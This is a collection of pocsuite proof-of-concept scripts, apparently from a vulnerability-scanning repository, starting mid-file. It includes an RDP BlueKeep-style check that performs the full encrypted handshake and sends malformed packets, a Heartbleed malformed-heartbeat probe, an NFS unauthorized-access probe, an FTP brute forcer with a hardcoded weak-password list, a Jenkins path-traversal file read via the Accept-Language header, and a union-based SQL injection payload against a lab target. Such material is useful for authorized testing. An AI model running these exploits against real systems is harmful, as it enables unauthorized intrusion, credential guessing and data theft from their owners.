            b"\x31\x32\x30\x00\x80\x80\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00"
            b"\xc0\x00\x00\x00\x73\x6e\x64\x64\x62\x67\x00\x00\xc0\x00\x00\x00"
            b"\x72\x64\x70\x64\x72\x00\x00\x00\x80\x80\x00\x00"
        )

    def _erect_domain_req(self):
        return (
            b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x00\x01\x00\x01"
        )

    def _attach_user_req(self):
        return (
            b"\x03" # TPKT Version: 3
            b"\x00" # Reserved: 0
            b"\x00\x08" # Length: 8
            b"\x02\xf0\x80\x28"
        )

    def _channel_join_req(self, initiator, channelId):
        return (
            b"\x03\x00\x00\x0c\x02\xf0\x80\x38%s%s"
        ) % (initiator, channelId)

    def _security_exchange(self, rcran, rsexp, rsmod, bitlen):
        x = (rcran ** rsexp) % rsmod
        nbytes, rem = divmod(x.bit_length(), 8)
        if rem:
            nbytes += 1
        encrytedClientRandom = x.to_bytes(nbytes, byteorder='little')
        self._log("Encrypted client random: %s" % self._bin_to_hex(encrytedClientRandom))
        bitlen += 8
        userdata_length = 8 + bitlen
        userdata_length_low = userdata_length & 0xFF
        userdata_length_high = userdata_length // 256
        flags = 0x80 | userdata_length_high
        return (
            b"\x03\x00%s" % (userdata_length + 15).to_bytes(2, byteorder='big') + # TPTK
            b"\x02\xf0\x80" # X.224
            b"\x64" # sendDataRequest
            b"\x00\x08" # initiator
            b"\x03\xeb" # channelId
            b"\x70" # dataPriority
            b"%s" % (flags).to_bytes(1, byteorder='big') +
            b"%s" % (userdata_length_low).to_bytes(1, byteorder='big') + # UserData length
            b"\x01\x00" # securityHeader flags
            b"\x00\x00" # securityHeader flagsHi
            b"%s" % (bitlen).to_bytes(4, byteorder='little') + # securityPkt length
            b"%s" % encrytedClientRandom + # 64 bytes encrypted client random 
            b"\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding
        )

    def _client_info(self):
        return binascii.unhexlify(
            "000000003301000000000a00000000000000000075007300650072003000000000000000000002001c003100390032002e003100360038002e0031002e0032003000380000003c0043003a005c00570049004e004e0054005c00530079007300740065006d00330032005c006d007300740073006300610078002e0064006c006c000000a40100004700540042002c0020006e006f0072006d0061006c0074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000a00000005000300000000000000000000004700540042002c00200073006f006d006d006100720074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000300000005000200000000000000c4ffffff00000000270000000000"
        )

    def _pdu_client_confirm_active(self):
        return binascii.unhexlify(
            "a4011300f103ea030100ea0306008e014d53545343000e00000001001800010003000002000000000d04000000000000000002001c00100001000100010020035802000001000100000001000000030058000000000000000000000000000000000000000000010014000000010047012a000101010100000000010101010001010000000000010101000001010100000000a1060000000000000084030000000000e40400001300280000000003780000007800000050010000000000000000000000000000000000000000000008000a000100140014000a0008000600000007000c00000000000000000005000c00000000000200020009000800000000000f000800010000000d005800010000000904000004000000000000000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c000800010000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000fe008000fe000001400000080001000102000000"
        )

    def _pdu_client_persistent_key_list(self):
        return binascii.unhexlify(
            "49031700f103ea03010000013b031c00000001000000000000000000000000000000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        )

    def _try_check(self, rc4enckey, hmackey):
        for i in range(5):
            res = self._rdp_recv()
        for j in range(5):
            self._rdp_send(self._rdp_encrypted_pkt(binascii.unhexlify("100000000300000000000000020000000000000000000000"), rc4enckey, hmackey, b"\x08\x00", b"\x00\x00", b"\x03\xed"))
            self._rdp_send(self._rdp_encrypted_pkt(binascii.unhexlify("20000000030000000000000000000000020000000000000000000000000000000000000000000000"), rc4enckey, hmackey, b"\x08\x00", b"\x00\x00", b"\x03\xed"))
            for i in range(3):
                res = self._rdp_recv()
                if binascii.unhexlify("0300000902f0802180") in res:
                    return True
        return False

    def _rdp_hmac(self, hmackey, data):
        s = hashlib.sha1()
        m = hashlib.md5()
        pad1 = b'\x36' * 40
        pad2 = b'\x5c' * 48
        s.update(hmackey + pad1 + len(data).to_bytes(4, byteorder='little') + data)
        m.update(hmackey + pad2 + s.digest())
        return m.digest()

    def _rdp_rc4_crypt(self, rc4enckey, data):
        return rc4enckey.crypt(data)

    def _rdp_encrypted_pkt(self, data, rc4enckey, hmackey, flags=b"\x08\x00", flagsHi=b"\x00\x00", channelId=b"\x03\xeb"):
        userData_len = len(data) + 12
        udl_with_flag = 0x8000 | userData_len
        pkt = (
            b"\x02\xf0\x80" # X.224
            b"\x64" # sendDataRequest
            b"\x00\x08" # initiator
            b"%s" % channelId + # channelId
            b"\x70" # dataPriority
            b"%s" % (udl_with_flag.to_bytes(2, byteorder='big')) +  # udl_with_flag
            b"%s" % flags + # flags  SEC_INFO_PKT | SEC_ENCRYPT
            b"%s" % flagsHi + # flagsHi
            b"%s" % self._rdp_hmac(hmackey, data)[0:8] + # rdp_hmac
            b"%s" % self._rdp_rc4_crypt(rc4enckey, data) # drp_rc4_encrypt
        )
        tpkt = (
            b"\x03\x00"
            b"%s" % ((len(pkt) + 4).to_bytes(2, byteorder='big')) +
            b"%s" % pkt
        )
        return tpkt

    def _rdp_parse_serverdata(self, pkt):
        ptr = 0
        rdp_pkt = pkt[0x49:]
        while ptr < len(rdp_pkt):
            header_type = rdp_pkt[ptr:ptr+2]
            header_length = int.from_bytes(rdp_pkt[ptr+2:ptr+4], byteorder='little')
            self._log("header type: %s, header length: %d" % (self._bin_to_hex(header_type), header_length))

            if header_type == b'\x02\x0c':
                self._log("security header")
                server_random = rdp_pkt[ptr+20:ptr+52]
                public_exponent = rdp_pkt[ptr+84:ptr+88]
                modulus = rdp_pkt[ptr+88:ptr+152]
                self._log("modulus old: %s" % self._bin_to_hex(modulus))
                self._log("RSA magic: %s" % rdp_pkt[ptr+68:ptr+72].decode())
                bitlen = int.from_bytes(rdp_pkt[ptr+72:ptr+76], byteorder='little') - 8
                self._log("RSA bitlen: %d" % bitlen)
                modulus = rdp_pkt[ptr+88:ptr+88+bitlen]
                self._log("modulus new: %s" % self._bin_to_hex(modulus))
            ptr += header_length

        self._log("SERVER_MODULUS: %s" % self._bin_to_hex(modulus))
        self._log("SERVER_EXPONENT: %s" % self._bin_to_hex(public_exponent))
        self._log("SERVER_RANDOM: %s" % self._bin_to_hex(server_random))
        rsmod = int.from_bytes(modulus, byteorder='little')
        rsexp = int.from_bytes(public_exponent, byteorder='little')
        rsran = int.from_bytes(server_random, byteorder='little')
        self._log("rsmod: %d" % rsmod)
        self._log("rsexp: %d" % rsexp)
        self._log("rsran: %d" % rsran)
        return rsmod, rsexp, rsran, server_random, bitlen

    def _rdp_salted_hash(self, s_bytes, i_bytes, clientRandom_bytes, serverRandom_bytes):
        m = hashlib.md5()
        s = hashlib.sha1()
        s.update(i_bytes + s_bytes + clientRandom_bytes + serverRandom_bytes)
        m.update(s_bytes + s.digest())
        return m.digest()

    def _rdp_final_hash(self, k, clientRandom_bytes, serverRandom_bytes):
        m = hashlib.md5()
        m.update(k + clientRandom_bytes + serverRandom_bytes)
        return m.digest()

    def _rdp_calculate_rc4_keys(self, client_random, server_random):
        preMasterSecret = client_random[0:24] + server_random[0:24]
        masterSecret = self._rdp_salted_hash(preMasterSecret, b"A", client_random, server_random) + self._rdp_salted_hash(preMasterSecret, b"BB", client_random, server_random) + self._rdp_salted_hash(preMasterSecret, b"CCC", client_random, server_random)
        sessionKeyBlob = self._rdp_salted_hash(masterSecret, b"X", client_random, server_random) + self._rdp_salted_hash(masterSecret, b"YY", client_random, server_random) + self._rdp_salted_hash(masterSecret, b"ZZZ", client_random, server_random)
        initialClientDecryptKey128 = self._rdp_final_hash(sessionKeyBlob[16:32], client_random, server_random)
        initialClientEncryptKey128 = self._rdp_final_hash(sessionKeyBlob[32:48], client_random, server_random)
        macKey = sessionKeyBlob[0:16]
        self._log("PreMasterSecret: %s" % self._bin_to_hex(preMasterSecret))
        self._log("MasterSecret: %s" % self._bin_to_hex(masterSecret))
        self._log("sessionKeyBlob: %s" % self._bin_to_hex(sessionKeyBlob))
        self._log("mackey: %s" % self._bin_to_hex(macKey))
        self._log("initialClientDecryptKey128: %s" % self._bin_to_hex(initialClientDecryptKey128))
        self._log("initialClientEncryptKey128: %s" % self._bin_to_hex(initialClientEncryptKey128))
        return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob

    def _rdp_send(self, data):
        self._log(self._bin_to_hex(data))
        self.socket.sendall(data)

    def _rdp_recv(self):
        tptk_header = self.socket.recv(4)
        body = self.socket.recv(int.from_bytes(tptk_header[2:4], byteorder='big'))
        return tptk_header + body

    def _rdp_send_recv(self, data):
        self._rdp_send(data)
        return self._rdp_recv()

    def _check_rdp(self):
        try:
            self._rdp_send_recv(self._conn_req())
        except Exception as e:
            print(str(e))
            return False
        return True

    def _check_rdp_vuln(self):
        if not self._check_rdp():
            return False
        # send initial client data
        res = self._rdp_send_recv(self._connect_initial())
        rsmod, rsexp, rsran, server_rand, bitlen = self._rdp_parse_serverdata(res)

        # erect domain and attach user 
        self._rdp_send(self._erect_domain_req())
        res = self._rdp_send_recv(self._attach_user_req())
        initiator = res[-2:]

        # send channel requests
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1009)))
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1003)))
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1004)))
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1005)))
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1006)))
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1007)))
        self._rdp_send_recv(self._channel_join_req(initiator, struct.pack('>H', 1008)))

        client_rand = b'\x41' * 32
        rcran = int.from_bytes(client_rand, byteorder='little')
        self._log("Sending security exchange PDU")
        security_exchange_pdu = self._security_exchange(rcran, rsexp, rsmod, bitlen)
        self._log(self._bin_to_hex(security_exchange_pdu))
        self._rdp_send(security_exchange_pdu)

        rc4encstart, rc4decstart, hmackey, sessblob = self._rdp_calculate_rc4_keys(client_rand, server_rand)
        rc4enckey = RC4(rc4encstart)

        self._log("Sending encrypted client info PDU")
        res = self._rdp_send_recv(self._rdp_encrypted_pkt(self._client_info(), rc4enckey, hmackey, b"\x48\x00"))
        self._log("Received License packet: %s" % self._bin_to_hex(res))
        res = self._rdp_recv()
        self._log("Received Server Demand packet: %s" % self._bin_to_hex(res))
        self._log("Sending client confirm active PDU")
        self._rdp_send(self._rdp_encrypted_pkt(self._pdu_client_confirm_active(), rc4enckey, hmackey, b"\x38\x00"))
        self._log("Sending client synchronize PDU")
        self._log("Sending client control cooperate PDU")

        synch = self._rdp_encrypted_pkt(binascii.unhexlify("16001700f103ea030100000108001f0000000100ea03"), rc4enckey, hmackey)
        coop = self._rdp_encrypted_pkt(binascii.unhexlify("1a001700f103ea03010000010c00140000000400000000000000"), rc4enckey, hmackey)
        self._log("Grea2t!")
        self._rdp_send(synch)
        self._rdp_send(coop)

        self._log("Sending client control request control PDU")
        self._rdp_send(self._rdp_encrypted_pkt(binascii.unhexlify("1a001700f103ea03010000010c00140000000100000000000000"), rc4enckey, hmackey))
        self._log("Sending client persistent key list PDU")
        self._rdp_send(self._rdp_encrypted_pkt(self._pdu_client_persistent_key_list(), rc4enckey, hmackey))
        self._log("Sending client font list PDU")
        self._rdp_send(self._rdp_encrypted_pkt(binascii.unhexlify("1a001700f103ea03010000010c00270000000000000003003200"), rc4enckey, hmackey))

        return self._try_check(rc4enckey, hmackey)

    def _detect_os(self):
        finger = {
            "2000/xp": "0300000b06d00000123400",
            "2003": "030000130ed000001234000300080002000000",
            "2008": "030000130ed000001234000200080002000000",
            "win7/2008R2": "030000130ed000001234000209080002000000",
            "2008R2DC": "030000130ed000001234000201080002000000",
            "2012R2/8": "030000130ed00000123400020f080002000000"
        }
        new_finger = dict(zip(finger.values(), finger.keys()))
        s = self._create_socket()
        s.send(b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00")
        res = binascii.hexlify(s.recv(2048)).decode()
        s.close()
        if res in new_finger.keys():
            return new_finger[res]
        return ''


    def _verify(self):
        result = {}
        self.ip, self.port = (self.url.split('://')[-1].split('/')[0].split(':') + [3389])[0:2]
        self.port = int(self.port)
        try:
            os = self._detect_os()
        except Exception as e:
            os = 'unknown'
            print(str(e))
        self.socket = self._create_socket()
        if self._check_rdp_vuln():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['POSSIBLE OS'] = os
            result['VerifyInfo']['VULNERABLE TARGET'] = '%s:%d' % (self.ip, self.port)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(TestPOC)


#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import Output, POCBase, register_poc, logger
import struct
import socket
import time
import select
import binascii

class HeartBleed(POCBase):
    vulID = '89231'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2015-06-23'
    createDate = '2019-10-11'
    updateDate = '2019-10-11'
    references = ['https://www.seebug.org/vuldb/ssvid-89231']
    name = 'OpenSSL Heartbleed (CVE-2014-0160)'
    appPowerLink = 'https://www.openssl.org/'
    appName = 'openssl'
    appVersion = '1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1'
    vulType = 'Buffer overread'
    desc = '''
    OpenSSL Heartbleed 
    '''
    
    def h2bin(self, x):
        tmp = x.replace(' ', '').replace('\n', '')
        return binascii.hexlify(tmp.encode())
    
    @property
    def client_key_exchange(self):
        return self.h2bin('''
            16 03 02 00  dc 01 00 00 d8 03 02 53
            43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
            bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
            00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
            00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
            c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
            c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
            c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
            c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
            00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
            03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
            00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
            00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
            00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
            00 0f 00 01 01                                  
        ''')
    
    def get_msg_from_socket(self, some_socket, msg_length, time_out=5):
        end_time = time.time() + time_out
        received_data = b''
        remaining_msg = msg_length
        while remaining_msg > 0:
            read_time = end_time - time.time()
            if read_time < 0:
                return None
            read_socket, write_socket, error_socket = select.select([some_socket], [], [], time_out)
            if some_socket in read_socket:
                data = some_socket.recv(remaining_msg)
                if not data:
                    return None
                else:
                    received_data += data
                    remaining_msg -= len(data)
            else:
                pass
        return received_data
    
    def recv_msg(self, a_socket):
        header = self.get_msg_from_socket(a_socket, 5)
        if header is None:
            return None, None, None
        message_type, message_version, message_length = struct.unpack('>BHH', header)
        message_payload = self.get_msg_from_socket(a_socket, message_length, 10)
        if message_payload is None:
            return None, None, None
        return message_type, message_version, message_payload
    
    def send_n_catch_heartbeat(self, our_socket):
        our_socket.send(self.malformed_heartbeat)
        while True:
            content_type, content_version, content_payload = self.recv_msg(our_socket)
            if content_type is None:
                return False
            if content_type == 24:
                return True
            if content_type == 21:
                return False
    
    @property
    def malformed_heartbeat(self):
        return self.h2bin('''
            18 03 02 00 03
            01 40 00
        ''')
    
    def check_heardbeat(self, host='', port=0):
        local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        local_socket.connect((host, int(port)))
        local_socket.send(self.client_key_exchange)
        while True:
            t, version, payload = self.recv_msg(local_socket)
            if not t:
                return
            if t == 22 and ord(payload[0]) == 0x0E:
                break
        local_socket.send(self.malformed_heartbeat)
        return self.send_n_catch_heartbeat(local_socket)
    
    def _verify(self):
        result = {}
        try:
            host = self.url.split('//')[1]
            port = 443
            if self.check_heardbeat(host=host.encode(), port=port):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)
        
    
    def _attack(self):
        return self._verify()
    
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not heartbleed vulnerability')
        return output

register_poc(HeartBleed)


#!/usr/bin/env python
#coding=utf-8

import traceback
import base64
import socket
import binascii

# 将输入的url转换为ip:port，供socket使用
from pocsuite3.lib.utils import url2ip

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class NFS_POC(POCBase):
    vulID = 'NFS-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'NFS'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-14'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-14'  # 编写 PoC 的日期
    updateDate = '2020-04-14'  # PoC 更新的时间,默认和编写时间一样
    references = ['http://wp.blkstone.me/2019/11/ubuntu-nfs-unauth-access/']  # 漏洞地址来源,0day不用写
    name = 'NFS未授权访问漏洞'  # PoC 名称
    cvss = u"中危"


    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        # 传入True参数，得到host和port，参考：https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
        host, port = url2ip(target_url, True)  

        socket.setdefaulttimeout(5)   # 默认timeout时间
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        
        try:
            sock.connect((host, port))

            # NFS NULL Call
            NFS_NULL_Call = b'8000002831ec45220000000000000002000186a3000000040000000000000000000000000000000000000000'
            bNFS_NULL_Call = bytes.fromhex(NFS_NULL_Call.decode())

            #NFS_NULL_Call2 = base64.b64decode('gAAAKDHsRSIAAAAAAAAAAgABhqMAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA=')

            # 发送请求
            #sock.send(NFS_NULL_Call2)
            sock.send(bNFS_NULL_Call)


            # 接收响应
            hello = sock.recv(1024)

            # NFS NULL Reply
            NFS_NULL_Reply = binascii.b2a_hex(hello)

            NFS_XID = NFS_NULL_Reply[8:16]
            print(NFS_XID)


            print("[*] NFS NULL Reply: {0}".format(NFS_NULL_Reply))

            # 如果响应内容中有"31ec4522"（这个是XID，是请求中带的，如果响应中有则认为存在NFS协议）则认为存在漏洞
            if NFS_XID.decode() == '31ec4522':
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                return self.save_output(result)
    
            return self.save_output(result)
        except socket.error as msg:
            print('[*] Could not connect to the target NFS service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1])
            traceback.print_stack(msg)

    #漏洞攻击
    def _attack(self):
        return self._verify()



    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(NFS_POC)


#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import socket
from ftplib import FTP

class ftp(object):
    def __init__(self,target,port):
        self.target=target
        self.port=int(port)
        self.uservales=[]
        self.passwordvales=[]
    def check_port(self):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            port = sock.connect_ex((self.target,self.port))
            if port == 0:
                sock.close
                return True
            else:
                sock.close
                return False

        except socket.gaierror:
            print('Name or service not known')
            self.run()
    def brute_force_list(self):
        try:
            users = ["root", "ftp1", "ftp", "ftpadmin", "ftpusr"]
            passwords = ["root", "123456", "cisco123", "admin", "Admin", "Admin123", "toor", "system", "system123",
                             "System", "System123", "Admin123!@#", "root123!@#"]
            for user in users:
                user = user.strip()
                for password in passwords:
                    password = password.strip()
                    self.ftpbruter(user, password)
                    if self.uservales:
                        break
        except KeyboardInterrupt:
            return False
    def ftpbruter(self, username, password):
        try:
            ftp = FTP(self.target)
            ftp.login(username, password)
            ftp.quit()
            self.uservales.append(username)
            self.passwordvales.append(password)
        except KeyboardInterrupt:
            pass
        except:
            pass

    def run(self):
        try:
            if self.check_port() == True:
                self.brute_force_list()
                return (self.uservales,self.passwordvales)
            else:
                print('The port 21 is not open! Are you sure that is the FTP server?')
                return False
        except KeyboardInterrupt:
            return False

def poc(url):
    if url.startswith("http://"):
        url = url.strip("http://")
    if url.endswith("/"):
        url = url.strip("/")
    if ":" in url:
        url = url.split(":")
        ip = url[0]
        port = url[1]
        response = ftp(ip, port).run()
        return response
    else:
        ip=url
        response = ftp(ip, "21").run()
        return response

class TestPOC(POCBase):
    name = 'ftp_weak_pass'
    vulID = '无'
    author = ['sxd']
    vulType = 'weak-pass'
    version = '1.0'  # default version: 1.0
    references = ['https://www.seebug.org/vuldb/ssvid-62522']
    desc = '''
		   当网络上的主机提供匿名FTP服务时，用户则可以通过anonymous/空、FTP/FTP、USER/pass等匿名账号登陆到这些FTP服务器。

如果 FTP 服务使用了弱密码，攻击者可以加载字典文件猜解密码。

攻击者可以通过该漏洞获取主机文件系统信息。
		   '''
    vulDate = '2020-03-09'
    createDate = '2020-03-09'
    updateDate = '2020-03-09'
    appName = 'ftp'
    appVersion = 'ftp all'
    appPowerLink = ''
    samples = ['FTP','socket']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response[0]:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' ftp_weak_paass' + ' is exist!'
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = response[0]
            result['AdminInfo']['Password'] = response[1]
        return self.parse_output(result)
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: UTF-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip

import sys
reload(sys)
sys.setdefaultencoding('utf-8')




# 基础父类
class JenkinsPOC(POCBase):
    vulID = '43'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-07-26'  # 漏洞公开的时间,不知道就写今天

    author = 'r00t4dm'  # PoC作者的大名
    createDate = '2018-07-26'  # 编写 PoC 的日期
    updateDate = '2017-07-26'  # PoC 更新的时间,默认和编写时间一样
    references = 'https://nvd.nist.gov/vuln/detail/CVE-2018-1999002'  # 漏洞地址来源,0day不用写
    name = 'Jenkins arbitrary file read'  # PoC 名称
    appPowerLink = 'https://jenkins.io/'  # 漏洞厂商主页地址
    appName = 'Jenkins'  # 漏洞应用名称
    appVersion = 'Jenkins 2.132 and earlier, 2.121.1 and earlier'  # 漏洞影响版本
    vulType = 'arbitrary file read'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Jenkins任意文件读取漏洞
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass
    def _verify(self):
        result = {}
        #获取漏洞url
        #如果设置端口则取端口,没有设置则为默认端口
        import re
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = "8080"

        vul_ip = "http://%s:%s" % (_host, _port)



        import hashlib
        # 会话保持
        output = Output(self)
        file_name = "windows/win"
        BACKDIR_COUNT = 8

        header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
        try:
            vulurl = vul_ip+ '/plugin/credentials/.ini'
            vulurltest = req.get(vulurl, headers=header)
            if "MPEGVideo" in vulurltest.text:
                if vulurltest.text.find('version'):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = vulurl
                    result['VerifyInfo']['Payload'] = header
        except Exception as e:
            pass

        return self.save_output(result)

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register(JenkinsPOC)





from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout

 
class DemoPOC(POCBase):
    vulID = '11001'  
    version = '3.0'
    author = ['Polaris']
    vulDate = '2020-5-14'
    createDate = '2020-5-14'
    updateDate = '2020-5-14'
    references = ['https://github.com/pikachu']
    name = 'pikachu'
    appPowerLink = ''
    appName = 'pikachu'
    appVersion = '1.x'
    vulType = 'SQL'
    desc = '''
    pikachu靶场get请求SQL注入
    '''
    samples = []
    install_requires = ['']
 
    def _verify(self):
        result = {}

        payload = '/vul/sqli/sqli_str.php?name=1%27+union+select+1%2Cmd5%28123%29%23&submit=%E6%9F%A5%E8%AF%A2'
        target = self.url+payload
        response = requests.get(target)

        try:
            if "202cb962ac59075b964b07152d234b70" in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url+payload
        except Exception as e:
            pass
 
        return self.parse_output(result)
 
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
 
    def _attack(self):
        return self._verify()

register_poc(DemoPOC)


#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

